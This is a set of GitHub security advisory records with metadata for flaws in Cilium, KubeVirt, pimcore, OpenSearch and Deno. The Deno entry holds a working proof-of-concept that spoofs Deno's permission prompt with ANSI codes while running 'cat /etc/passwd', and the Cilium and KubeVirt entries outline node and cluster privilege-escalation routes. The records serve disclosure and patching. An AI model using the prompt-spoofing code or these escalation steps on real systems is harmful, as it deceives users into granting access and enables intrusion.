### Impact An attacker with access to a Cilium agent pod can write to `/opt/cni/bin` due to a `hostPath` mount of that directory in the agent pod. By replacing the CNI binary with their own malicious binary and waiting for the creation of a new pod on the node, the attacker can gain access to the underlying node. ### Patches The issue has been fixed and is available on versions >=1.11.15, >=1.12.8, >=1.13.1. ### Workarounds [Kubernetes RBAC](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) should be used to deny users and service accounts `exec` access to Cilium agent pods. In cases where a user requires `exec` access to Cilium agent pods, but should not have access to the underlying node, no workaround is possible. ### References * [PR containing resolution](https://github.com/cilium/cilium/pull/24075) ### Acknowledgements The Cilium community has worked together with members of Isovalent and Form3 to prepare these mitigations. Special thanks to Anastasios Koutlis, Daniel Teixeira, and Magdalena Oczadly for their cooperation. ### For more information If you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack). As usual, if you think you found a related vulnerability, we strongly encourage you to report security vulnerabilities to our private security mailing list: security@cilium.io - first, before disclosing them in any public forums. This is a private mailing list where only members of the Cilium internal security team are subscribed to, and is treated as top priority.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.15'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.12.0'}, {'fixed': '1.12.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/cilium/cilium'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.0'}, {'fixed': '1.13.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/cilium/cilium/security/advisories/GHSA-4hc4-pgfx-3mrx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27593'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/pull/24075'}, {'type': 'PACKAGE', 'url': 'https://github.com/cilium/cilium'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.11.15'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.12.8'}, {'type': 'WEB', 'url': 'https://github.com/cilium/cilium/releases/tag/v1.13.1'}, {'type': 'WEB', 'url': 'https://kubernetes.io/docs/reference/access-authn-authz/rbac/'}]
{'cwe_ids': ['CWE-276'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-17T18:20:46Z', 'nvd_published_at': '2023-03-17T20:15:00Z'}
1.4.0
GHSA-cp96-jpmq-xrr2
2023-03-27T22:24:34Z
2023-03-16T16:04:42Z
null
['CVE-2023-26484']
On a compromised node, the virt-handler service account can be used to modify all node specs
### Impact If a malicious user has taken over a Kubernetes node where virt-handler (the KubeVirt node-daemon) is running, the virt-handler service account can be used to modify all node specs. This can be misused to lure-in system-level-privileged components (which can for instance read all secrets on the cluster, or can exec into pods on other nodes). This way a compromised node can be used to elevate privileges beyond the node until potentially having full privileged access to the whole cluster. The simplest way to exploit this, once a user could compromise a specific node, is to set with the virt-handler service account all other nodes to unschedulable and simply wait until system-critical components with high privileges appear on its node. Since this requires a node to be compromised first, the severity of this finding is considered Medium. ### Patches Not yet available. ### Workarounds Gatekeeper users can add a webhook which will block the `virt-handler` service account to modify the spec of a node. An example policy, preventing virt-handler from changing the node spec may look like this: ```yaml apiVersion: templates.gatekeeper.sh/v1 kind: ConstraintTemplate metadata: name: virthandlerrestrictions spec: [...] targets: - libs: - | [...] is_virt_handler(username) { username == "system:serviceaccount:kubevirt:virt-handler" } mutates_node_in_unintended_way { # TODO # only allow kubevirt.io/ prefixed metadata node changes } rego: | [...] violation[{"msg": msg}] { is_virt_handler(username) mutates_node_in_unintended_way(input.review.object, input.review.oldObject) msg := sprintf("virt-handler tries to modify node <%v> in an unintended way.", [input.review.object.name]) } ``` and applying this template to node modifications. ### Credits Special thanks to the discoverers of this issue: Nanzi Yang (nzyang@stu.xidian.edu.cn) Xin Guo (guox@stu.xidian.edu.cn) Jietao Xiao (jietaoXiao@stu.xidian.edu.cn) Wenbo Shen (shenwenbo@zju.edu.cn) Jinku Li (jkli@xidian.edu.cn) ### References https://github.com/kubevirt/kubevirt/issues/9109
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'kubevirt.io/kubevirt'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.59.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/kubevirt/kubevirt/security/advisories/GHSA-cp96-jpmq-xrr2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26484'}, {'type': 'WEB', 'url': 'https://github.com/kubevirt/kubevirt/issues/9109'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubevirt/kubevirt'}]
{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T16:04:42Z', 'nvd_published_at': '2023-03-15T21:15:00Z'}
1.4.0
GHSA-rrwm-8wqm-gwgv
2023-03-16T18:33:28Z
2023-03-16T18:33:28Z
null
[]
Cross-site Scripting (XSS) - stored in Print Documents
### Impact Stored xss leads to steal cookies and other information of other users ### Patches Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14560.patch ### Workarounds Apply https://github.com/pimcore/pimcore/pull/14560.patch manually. ### References https://huntr.dev/bounties/31d97442-3f87-439f-83f0-1c7862ef0c7c/
[]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-rrwm-8wqm-gwgv'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T18:33:28Z', 'nvd_published_at': None}
1.4.0
GHSA-wmx7-x4jp-9jgg
2023-03-07T20:04:42Z
2023-03-07T20:04:42Z
null
['CVE-2022-41918']
OpenSearch has issue with fine-grained access control of indices backing data streams
### Impact There is an issue with the implementation of fine-grained access control rules (document-level security, field-level security and field masking) where they are not correctly applied to the indices that back data streams potentially leading to incorrect access authorization. This issue can only be triggered by authenticated users authorized to read those data streams which are backed by the impacted indexes. Additionally, existing privileged users cannot access random indexes within these clusters; they can only access indexes to which they have already been granted permission. ### Patches OpenSearch 1.3.7 and 2.4.0 contain a fix for this issue. ### Workarounds There is no recommended work around. ### For more information If you have any questions or comments about this advisory, please contact AWS/Amazon Security via our issue reporting page (https://aws.amazon.com/security/vulnerability-reporting/) or directly via email to aws-security@amazon.com. Please do not create a public GitHub issue.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.opensearch.plugin:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.opensearch.plugin:opensearch-security'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.4.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/opensearch-project/security/security/advisories/GHSA-wmx7-x4jp-9jgg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-41918'}, {'type': 'WEB', 'url': 'https://github.com/opensearch-project/security/commit/f7cc569c9d3fa5d5432c76c854eed280d45ce6f4'}, {'type': 'PACKAGE', 'url': 'https://github.com/opensearch-project/security'}]
{'cwe_ids': ['CWE-612', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:04:42Z', 'nvd_published_at': '2022-11-15T23:15:00Z'}
1.4.0
GHSA-hfmg-g39c-5444
2023-03-31T16:23:49Z
2023-03-31T16:23:49Z
null
['CVE-2023-1704']
pimcore is vulnerable to cross-site scripting in translate module
### Impact This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites. ### Patches Update to version 10.5.20 or apply this patch manually https://github.com/pimcore/pimcore/pull/14732.patch ### Workarounds Apply https://github.com/pimcore/pimcore/pull/14732.patch manually. ### References https://huntr.dev/bounties/84419c7b-ae29-401b-bdfd-5d0c498d320f/
[]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.20'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-hfmg-g39c-5444'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1704'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14732.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/295f5e8d108b68198e36399bea0f69598eb108a0'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/84419c7b-ae29-401b-bdfd-5d0c498d320f'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T16:23:49Z', 'nvd_published_at': None}
1.4.0
GHSA-vq67-rp93-65qf
2023-03-24T22:06:01Z
2023-03-24T22:06:01Z
null
['CVE-2023-28446']
Interactive `run` permission prompt spoofing via improper ANSI neutralization
### Summary Arbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a `op_spawn_child` or `op_kill` prompt and replace it with any desired text. ### Details The main entry point comes down to the ability to override what the API control says ([40_process.js](https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175)). Because of ANSI code's ability to clear lines, a malicious program can clear the last 2 lines of the prompt and put their own header. This also works in `op_kill`. ### PoC This PoC works on 1.31.1, but modified versions of it work on older versions. Make a file, e.g. `index.ts`, that uses this vulnerability to spoof the `op_spawn_child` permission prompt ```ts const boldANSI = "\u001b[1m" // bold const unboldANSI = "\u001b[22m" // unbold const prompt = `┌ ⚠️ ${boldANSI}Deno requests run access to "echo"${unboldANSI} ├ Requested by \`Deno.Command().output()` const moveANSIUp = "\u001b[1A" // moves to the start of the line const clearANSI = "\u001b[2K" // clears the line const moveANSIStart = "\u001b[1000D" // moves to the start of the line Deno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({ cmd: "cat", args: ["/etc/passwd"], clearEnv: false, env: [], stdin: "null", stdout: "inherit", stderr: "piped" }, moveANSIUp + clearANSI + moveANSIStart + prompt) ``` Run the file with `deno run index.ts`. ### Impact Any Deno program is able to spoof the interactive permission prompt for the `op_spawn_child` or the `op_kill` action (which indirectly gives access to all run commands) by overriding the `Requested by {message} API` with their own ANSI codes, allowing them to clear the latter prompt and change it to whatever they needed: ``` // Expected Prompt ┌ ⚠️ Deno requests run access to "cat" ├ Requested by `Deno.Command().output()` API ├ Run again with --allow-run to bypass this prompt. └ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) > // Actual Prompt ┌ ⚠️ Deno requests run access to "echo" ├ Requested by `Deno.Command().output()` API ├ Run again with --allow-run to bypass this prompt. └ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) > ``` This works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run. This problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers). Before `v1.31.0`, this requires the `--unstable` flag.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'deno_runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.31.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'deno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.31.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/denoland/deno/security/advisories/GHSA-vq67-rp93-65qf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28446'}, {'type': 'PACKAGE', 'url': 'https://github.com/denoland/deno'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/releases/tag/v1.31.2'}]
{'cwe_ids': ['CWE-150'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:06:01Z', 'nvd_published_at': '2023-03-24T20:15:00Z'}